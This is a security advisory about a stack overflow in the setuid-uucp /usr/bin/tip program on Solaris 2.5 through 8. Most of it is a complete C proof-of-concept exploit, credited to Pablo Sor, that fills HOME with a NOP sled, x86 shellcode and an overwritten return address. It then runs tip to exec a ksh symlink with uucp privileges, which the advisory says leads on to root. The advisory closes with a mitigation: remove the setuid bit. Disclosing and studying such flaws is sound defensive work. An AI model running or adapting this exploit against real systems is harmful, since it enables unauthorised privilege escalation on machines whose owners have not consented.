COMMAND

    /usr/bin/tip

SYSTEMS AFFECTED

    Solaris 2.5, 2.5.1, 2.6, 7, 8

PROBLEM

    Pablo Sor found the following.  The tip program is installed setuid
    uucp by default on Solaris.  It mishandles data taken from an
    environment variable: if the variable's value exceeds a predefined
    length, an exploitable stack overflow occurs.  By exploiting this, a
    local attacker can gain effective uid uucp and, from there, root.
    The proof of concept below targets the HOME variable and was written
    for x86 Solaris 7 and 8.

    Exploit Code:

    #include <fcntl.h>
    #include <stdint.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>
    
    /*
       /usr/bin/tip overflow proof of concept.
    
    
       Pablo Sor, Buenos Aires, Argentina 03/2001
       psor@afip.gov.ar
    
       works against x86 solaris 7,8
    
       default offset should work.
    
    */
    
    
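    /*
     * Return the current stack pointer (esp on i386, rsp on x86-64).
     *
     * The PoC adds a fixed delta to this value to produce the address it
     * writes into the overflow, presumably to land inside the NOP sled once
     * tip has the same environment on its own stack, so it only has to be
     * roughly right.  The value is read through an explicit asm output
     * operand and returned with a real return statement; the original left
     * esp in eax and fell off the end of a non-void function, which is
     * undefined behaviour in C and only worked by accident of the ABI.
     */
    long get_esp(void)
    {
        long sp;
    #if defined(__x86_64__)
        __asm__ __volatile__ ("movq %%rsp, %0" : "=r"(sp));
    #elif defined(__i386__)
        __asm__ __volatile__ ("movl %%esp, %0" : "=r"(sp));
    #else
    #error "get_esp: this proof of concept is x86 only"
    #endif
        return sp;
    }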
    
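    /*
     * Build an oversized HOME=... string, run the setuid-uucp tip with it and
     * let the overflow exec /tmp/xx (a symlink to ksh) with uucp privileges.
     *
     * Payload layout (ENV_LEN bytes, followed by a NUL):
     *   "HOME=" | NOP sled (0x90) | 4-byte stack address at RET_OFF |
     *   more sled | shellcode ending at byte ENV_LEN-1
     *
     * Returns 0 after tip has been run, 1 if /tmp/xx could not be created.
     * Command-line arguments are ignored.
     */
    int main(int ac, char **av)
    {
      /* Solaris/x86 shellcode from the original PoC.  It contains the string
         "/tmp/xx" and appears to patch its own placeholder bytes to zero before
         issuing syscalls via the lcall gate; not re-verified here. */
      static const char shell[] =
      "\xeb\x0a\x9a\x01\x02\x03\x5c\x07\x04\xc3\xeb\x05"
      "\xe8\xf9\xff\xff\xff\x5e\x29\xc0\x88\x46\xf7\x89\x46\xf2"
      "\x50\xb0\x8d\xe8\xe0\xff\xff\xff\x6a\x05\x90\xb0\x17\xe8\xd6\xff\xff\xff"
      "\xeb\x1f\x5e\x8d\x1e\x89\x5e\x0b\x29\xc0\x88\x46\x19\x89\x46\x14"
      "\x89\x46\x0f\x89\x46\x07\xb0\x3b\x8d\x4e\x0b\x51\x51\x53\x50\xeb\x18"
      "\xe8\xdc\xff\xff\xff\x2f\x74\x6d\x70\x2f\x78\x78\x01\x01\x01\x01\x02\x02"
      "\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";

      enum {
        ENV_LEN  = 600,   /* bytes of "HOME=..." payload, not counting the NUL */
        RET_OFF  = 265,   /* where the 4-byte stack address is placed in buf
                             (the overwritten return address, per the PoC;
                             tuned for x86 Solaris 7/8) */
        SP_DELTA = 0x50   /* "default offset" added to our own stack pointer */
      };
      const size_t shell_len = sizeof shell - 1;   /* shellcode has no NUL bytes */
      char buf[ENV_LEN + 1];
      uint32_t ret;

      (void)ac;
      (void)av;

      /* Only the low 32 bits are written into the payload; that is the whole
         value on the 32-bit target, and the truncation is explicit rather
         than relying on memcpy(&long, 4) on whatever host builds this. */
      ret = (uint32_t)(get_esp() + SP_DELTA);

      /* /tmp/xx is a predictable name in a world-writable directory and is
         what the shellcode execs with uucp privileges.  If the link cannot be
         made (typically EEXIST), stop rather than exec whatever another local
         user may have planted under that name. */
      if (symlink("/bin/ksh", "/tmp/xx") != 0) {
        perror("symlink /tmp/xx");
        return 1;
      }

      memset(buf, 0x90, ENV_LEN);               /* NOP sled */
      buf[ENV_LEN] = '\0';                      /* terminator sits past the payload, so the
                                                   shellcode copy below cannot clobber it
                                                   (the original overwrote its own NUL and
                                                   handed putenv an unterminated string) */
      memcpy(buf, "HOME=", 5);
      memcpy(buf + RET_OFF, &ret, sizeof ret);
      memcpy(buf + ENV_LEN - shell_len, shell, shell_len);

      /* putenv() keeps the pointer rather than copying; buf outlives the
         system() call below, which is all that is needed. */
      putenv(buf);

      /* system() runs via /bin/sh, which passes our environment on to tip. */
      if (system("/usr/bin/tip 5") == -1) {
        perror("system");
      }
      unlink("/tmp/xx");
      return 0;
    }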

SOLUTION

    Clear the setuid bit on /usr/bin/tip (chmod u-s /usr/bin/tip).  Note
    that tip will then run with the invoking user's privileges only, so
    any use that depended on its uucp privileges may stop working until
    a vendor patch is applied.  Patches are expected shortly.